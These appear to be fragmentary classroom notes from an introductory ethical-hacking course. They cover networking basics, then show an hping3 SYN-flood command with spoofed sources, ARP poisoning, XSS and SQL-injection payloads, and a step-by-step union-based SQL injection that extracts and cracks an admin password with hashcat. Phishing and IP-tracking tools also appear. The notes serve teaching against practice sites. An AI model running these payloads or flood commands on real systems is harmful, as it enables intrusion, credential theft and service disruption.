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ICCS | Pune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oghnbww65uur" w:id="0"/>
      <w:bookmarkEnd w:id="0"/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Cyber : Digital : Internet Connectivity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Website, Laptop, Smart Watch, Mobile, CCTV, WiFi, Cars, Fan etc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Security : To privide protection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Ethical : Legal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Hacking : Breaking Locks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Room (Gold  Diamond Cash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CCTV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Door Locks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Guards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Safe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Sensor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Honeypot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Bulletproof Glass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Biomet.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www.rekhaBank.com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Username, Password, Balance, PID, Phone etc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firewall - ids ips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desgn acha kro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2FA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https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Access COntrol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 Monitoring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Mobile Security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Hacker : A person who is having good knowledge about computer security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wp8cuvpv9rfl" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Types of Hacker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White Hat Hacker : With Permission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Black Hat Hacker : Without Permission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Illegal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Grey Hat Hacker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Sometimes, White, &amp; Sometime Black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q12xv0mf5rmk" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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Phone --&gt; Mic, Camera, Speaker, Touch etc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Windows etc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Desktop/Laptop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1990's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Microsoft : Windows : 7, 8, 10, 11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Pay Money : 10,000 INR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Linux : Free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Linux ---&gt; Editng ---&gt; GUI ---&gt; Apple ---&gt; MACBOOK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Linux ---&gt; Editng ---&gt; GUI ---&gt; Apple ---&gt; IOS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Linux ---&gt; Editng ---&gt; GUI ---&gt; Offensive Sec --&gt; Kali Linux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Linux ---&gt; Editng ---&gt; GUI ---&gt; Ubuntu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Linux ---&gt; Editng ---&gt; GUI ---&gt; Google ---&gt; Android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Task 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ab/>
        <w:t xml:space="preserve"> India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|   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">|   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> |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Punjab   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Delhi    </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Maharashtra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|   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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Chandigarh </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Amritsar   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Mumbai   Pune     Shirdi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wteax32i49r1" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking 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Social Network : Multiple people can connect each other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Computer Network --&gt;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atcw1dabet9l" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Address 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BL    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 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192.168.267.98    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No/NI   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">      No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172.16.168.298    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No/NI    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No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10.0.0.1    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes/NI    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes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192.168.10.8.45    </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> No    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No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132.0.6.0    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes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192.168.324.67    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No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9.0.0.1    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes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127.0.0.1.34    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes/No    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> No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156.87.78.76    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Yes    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> Yes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1234:1bcd:789a:1bc4:1111:2222:aaaa:1a2b     No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1234:1bcd::1bc4:1111::aaaa:1a2b </w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;----- No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1234:1bcd:789a::1111:2222:aaaa:1a2b</w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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1234:1bcd:789a:::1111:2222:aaaa:1a2b</w:t>
        <w:tab/>
        <w:t xml:space="preserve">No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1234:1bcd:789a:0000:0000:2222:aaaa:1a2b  yes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1234:1bcd:789a:1:1111:2222:aaaa:1a2b   yes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IPv4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IP Address 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A.B.C.D   &lt;--- 4 Octet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Length = 32 Bits = Single Octet = 8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Value : 0-255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153.128.0.1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159.9.72.10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172.12.0.128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0.0.0.0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255.255.255.255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4.3 Billion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430 Crore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8 Octets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A:B:C:D:E:F:G:H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128 Bits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abcd:abcd:abcd:abcd:abcd:abcd:abcd:abcd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Value : a/b/c/d = 0-9 a-f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1234:2409:4608:26ad:abcd:897f:ffff:3900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2a3b:abcd:4c02:3243:1010:0000:2acc:1f1f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2a3b:abcd:4c02:0000:1010::2acc:1f1f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2a3b:abcd:4c02:3243:0000:0000:2acc:1f1f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2a3b:abcd:4c02:3243::2acc:1f1f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2a3b:abcd:4c02:0000:0000:0000:2acc:1f1f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2a3b:abcd:4c02::2acc:1f1f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2a3b:abcd:4c02::2acc:1f1f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2a3b:abcd:4c02:0000:0000:0000:2acc:1f1f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2a3b:000a:4c02::2acc:1f1f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2a3b:a:4c02::2acc:1f1f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1.2.3.4    </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 1.2.3.4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ISP ------&gt;  Modem -))))  ---&gt; D1   D2   D3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Private IP    </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 192.168.10.2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Public IP : This  IP is given by ISP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This is Unique on Planet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Google : My IP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Private IP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CMD --&gt; Ipconfig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Termnal --&gt; ifconfig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Connected on Same WIFI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Device 1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Device 2     Device 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Public IP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Private IP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Mobile Data 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Device 1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Device 2     Device 3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Public IP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Restart your Devices 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securemepersonal@gmail.com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securemepersonal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@gmail.com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SECUREmepersonal@gmail.com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SeCuReM...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sEc...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secureme.personal@gmail.com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secure.me.personal@gmail.com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s.e.c.u.r.e.m....e.p.e.r.s.o.nal@gmail.com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https://drive.google.com/drive/folders/1k3rB7TUp_IeTnUnWMYmE7uCginP5y-Tq?usp=sharing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uni@%!@)(ind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uni@%!@)(ind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Day 2 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vk8r1m4cc76x" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DOS &amp; DDOS Attack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Windows XP - Target Server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192.168.167.131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Hacker Machine : Kali Linux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192.168.167.135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HPING3 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#hping3 -c 10000 -d 120 -S -w 64 -p 135 --flood --rand-source www.hping3testsite.com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hping3 = Name of the application binary.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-c 100000 = Number of packets to send.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-d 120 = Size of each packet that was sent to target machine.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-S = I am sending SYN packets only.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-w 64 = TCP window size.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-p 135 = Destination port. You can use any port here.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--flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.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--rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.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www.website.com = Destination IP address or target machines IP address.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Blank Name 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Alt+255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43a5o1ep17er" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Scanning 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#nmap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Linux : #netdiscover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Windows : Advanced IP  Scanner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Android/IOS : Fing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Linux : #netdiscover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Interface : enp3s0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IP : 172.16.6.244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#sudo netdiscover -i enp3s0 -r 172.16.6.244/24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====================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DOS/DDOS Attack   or  Jamming/Flood Attack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DNS Protocol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ICMP Protocol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ARP Protocol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ARP Poison Attack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26eiero3kcyw" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bitcoin Currency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bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq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bitref.com  &lt;-- Check balance in Bitcoin Wallet ID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DNS : Domain Name System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varun   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 56.98.89.78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jammu    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 45.78.67.67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rekha    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 56.12.56.98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aditya    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 12.98.234.56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hacker    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 156.98.45.45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janu    </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 99.99.99.99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ARP Protocol : Address Resolution Protocol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ARP Poison Attack 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Kali Linux ---&gt; Ettercap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IP : 192.168.167.135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DG : 192.168.167.2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Windows OS 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IP : 192.168.167.142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DG : 192.168.167.2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IndiraWlan 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uni@%!@)(ind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172.17.19.115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9exd0upspoy" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disk Encryption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Palvinder ---&gt; Plain Text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67yHU&amp;YTghU&amp;YH   ---&gt; Cipher Text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Rules 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 --&gt; B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 --&gt; C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 --&gt; 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Palvinder  --&gt;   Qbmwjoefs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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o8uf42s6xm6g" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Security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website : www.abc.com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WA : website + Router + CCTV +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Security Standards : OWASP Top 10 Attacks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Open Web Application Security Project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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_71sdh9s753ba" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting = XSS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Website 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Front End --- User Interface | Public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Back End --- Coding, Database | Developer /Owner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Code Changes ---&gt; Back End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Add Code / ---&gt; Back End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Javascript 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&lt;script&gt;window.alert("Hi Aditya");&lt;/script&gt;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&lt;h1&gt;Hi welcome to CYber Security&lt;/h1&gt;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Step 1: Look for Input Parameter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Places --&gt; Likh skte hai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Search Box,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Username, Password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Chat etc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Registration Forms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Step 2: Genuine Testing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Search --&gt; Test   --&gt;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Step 3: Put a code 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&lt;script&gt;window.alert("Hi Aditya");&lt;/script&gt;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Pop-Up = Yes ---&gt; Website is Vulnerable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Pop-Up = No ---&gt; Website is Safe from this Attack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testphp.vulnweb.com   &lt;----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src="https://www.youtube.com/embed/BIHUVKVVQNk?si=RX3_7oK-9coJ32jh"&gt;&lt;/iframe&gt;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XSS --&gt; Code --&gt; Execute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1. No Save : Refelected XSS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search, url, login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2. Save in Database : Stored XSS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Comment, Message, SignUP,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http://testasp.vulnweb.com/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waubgom4k5xs" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection Attack 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Authentication Bypass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Union Based SQL Injection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Error Based....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Authentication Bypass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www.website.com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username : ***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password : ***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www.website.com/admin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Full Control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Attacking SQL String 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username : 1'or'1'='1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password : 1'or'1'='1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Universal True SQL String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testphp.vulnweb.com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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a9jpiph74vg6" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Union Based SQL Injection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Requirement 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Technology : PHP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Database : MySQL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testphp.vulnweb.com/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Step 1: Find GET Parameter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testphp.vulnweb.com/.......php?id=1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testphp.vulnweb.com/.......php?name=palvinder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php?hi=bye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php?area=pune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?anything=anything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Try different link &amp; options in the website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Step 2: Exception Handling = Vulnerable or Not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testphp.vulnweb.com/.......php?id=1'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Any change in the Website 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 Images Corrupted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 Content Missing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 Error SQL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- Blank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Yes, Website is Vulnerable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No Change in the Website --&gt; No Vulnerable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Step 3: Count No. of Order/Columns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testphp.vulnweb.com/.......php?id=1' order by 1--+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testphp.vulnweb.com/.......php?id=1 order by 1--+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Either of above --&gt; Website will work properly, Continue with that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testphp.vulnweb.com/.......php?id=1' order by 1--+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testphp.vulnweb.com/.......php?id=1' order by 2--+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testphp.vulnweb.com/.......php?id=1' order by 3--+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testphp.vulnweb.com/.......php?id=1' order by 4--+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testphp.vulnweb.com/.......php?id=1' order by 5--+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testphp.vulnweb.com/.......php?id=1' order by 10--+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testphp.vulnweb.com/.......php?id=1' order by 11--+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testphp.vulnweb.com/.......php?id=1' order by 12--+  &lt;-- Error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No. of Column = 11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Our Case : 4 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Step 4: Find Vulnerable Number out of 4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testphp.vulnweb.com/.......php?id=1 union select 1,2,3,4--+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testphp.vulnweb.com/.......php?id=-1 union select 1,2,3,4--+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Results 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This will display some numeric values on screen out of (1,2,3,4)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Those will be Vulnerable Columns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Example : 2,3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http://172.20.10.2/cat.php?id=-1 union select 1,2,3,4--+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Our Case : 2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Step 5: Find name of the Database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Query : database()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http://172.20.10.2/cat.php?id=-1 union select 1,database(),3,4--+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Name of Database : photoblog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Database Name ---&gt; Tables ---&gt; Columns ---&gt; Data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Step 6: Find list of Tables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Query : table_name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http://172.20.10.2/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables--+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users   &lt;---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*****   | </w:t>
        <w:tab/>
        <w:t xml:space="preserve">*****</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|   ****</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|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 &lt;-- Users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Step 7: Get Columns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http://172.20.10.2/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+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ID  </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> | </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Login</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|   Password|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 &lt;-- Users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|    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">|    </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">|  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Step 8 : Get Data for Column (Login)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http://172.20.10.2/cat.php?id=-1 union select 1,login,3,4 from users--+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Login = Admin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Step 9 : Get Data for another Columns (Password)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http://172.20.10.2/cat.php?id=-1 union select 1,password,3,4 from users--+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Password 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8efe310f9ab3efeae8d410a8e0166eb2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32 Character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HexaDeci = 0-9 a-f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Hash : MD5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Kali Linux = Hashcat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Google =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Password = P4ssw0rd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Step 10 : Cracking the Hash using Kali Linux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#sudo gunzip /usr/share/wordlists/rockyou.txt.gz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#sudo hashcat -m 0 -a 0 /path/of/hashfile.txt /usr/share/wordlists/rockyou.txt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-m = Hash Type  (0 - MD5)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-a = Attack Mode (0 - Simple Attack)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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2i202gpi4yb1" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Attack &amp; Security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Kali Linux = Github = PyPhisher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http://www.zomato.com/     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;-- Genuine / Fake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Domain Name = zomato.com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www.zoomato.com/      &lt;-- Fake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Domain Name = Zoomato.com  &lt;-- Fake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login.hacker.securi1y.zomato.com/      &lt;-- Fake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Domain Name = Genuine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https://zomato.com.login.account.ytfv.com/login.php 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Domain Name = ytfv.com</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;-- Fake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&lt;-- Fake / Pta nahi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https://safety.zomato.customer.login.com/  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Doamin Name - login.com  &lt;-- Fake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&lt;-- Genuine / Fake / Pta nahi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order.pizza.customer.login.zomato.com/credential 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Domain Name = zomato.com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&lt;-- Genuine b ho skta hai / pkka Fake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offer.50%.sunday.breakfast.zomato.com/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Domain Name = Zomato.com  &lt;-- Gnuine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&lt;-- Pkkkka  Fake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http://drive--google.com/luke.johnson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Domain Name =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http://efax.hosting.com.mailru382.co/efaxdelivery/2017Dk4h325RE3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href="https://drive.google.com.download-photo.sytez.net/AONh1e0hVP"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https://phishingquiz.withgoogle.com/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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h9tx2cdg6vuo" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Tracking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Kali Linux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Parrot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Red Hat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tinyurl.com/iccs23cs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Web Tracking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============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www.youtube.com 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grabify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https://myprivate.pics/image.php?id=J9D7C8.jpg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Link Tracking &lt;-- Link Click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https://iplis.ru/iccs.jpg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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5v12nvl71lpf" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BrutefForce Attack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Hit &amp; Trial Method --&gt; Grab someone's credential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username : abc@gmail.com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Password : ****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abc@gmail.com +  123  &lt;--- 60 Seconds = 1 Min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abc@gmail.com  +   testing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abc@gmail.com  + Admin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abc@gmail.com + Hacker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20000 Minutes = 333 Hours =  13 Days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Manual Method = Failed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Automated Method - Kal Linux = Hydra / BurpSuite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0001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0002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9996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9997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9998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9999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No. of attempts should be Limited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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k7viinr7gr3c" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Dorks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Google : Free Download PPT on Network Security Online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URL ----&gt;  inurl:iccs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TITLE ----&gt;  intitle:iccs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TEXT ----&gt; intext:iccs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Google : Free Download PPT on Network Security Online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filetype:ppt Network Security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indexof:/movie/ intercepter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367.9999999999998" w:top="907.2" w:left="907.2" w:right="936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